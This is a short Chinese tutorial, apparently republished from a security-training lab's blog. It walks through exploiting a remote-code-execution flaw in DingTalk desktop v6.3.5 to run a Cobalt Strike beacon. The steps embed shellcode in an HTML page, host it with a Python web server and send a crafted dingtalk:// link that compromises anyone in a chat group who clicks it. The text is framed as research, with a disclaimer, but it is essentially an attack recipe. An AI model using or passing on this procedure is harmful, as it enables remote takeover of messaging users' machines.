文章来源|MS08067 安全实验室
本文作者:Taoing(Web漏洞挖掘班讲师)
项目地址:https://github.com/crazy0x70/dingtalk-RCE
本次测试环境:
钉钉:DingTalk_v6.3.5.11308701
下载地址:https://dtapp-pub.dingtalk.com/dingtalk-desktop/win_installer/Release/DingTalk_v6.3.5.11308701.exe
CS:4.4
payload为32位c语言
1.生成payload
生成32为c语言格式payload
2.修改payload格式
使用编辑器打开payload,将x修改为0x,注意使用逗号分隔
替换前
替换后
将替换后的shellcode复制到test.html中的shellcode=new Uint8Array部分,注意去掉开头的逗号
替换前
替换后
3.部署web服务
使用python开一个web服务,将替换后的test.html放入web文件夹
python3 -m http.server 80
4.钉钉发送poc
将poc发送至聊天窗口
dingtalk://dingtalkclient/page/link?url=ip:port/test.html&pc_slide=true
5.上线
点击poc即可上线,发到群里别人点需要cs和web服务部署到公网,同时非安全版本钉钉才能上线
— 实验室旗下直播培训课程 —
来和20000+位同学加入MS08067一起学习吧!
原文始发于微信公众号(Ms08067安全实验室):dingtalk-RCE上线CS
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论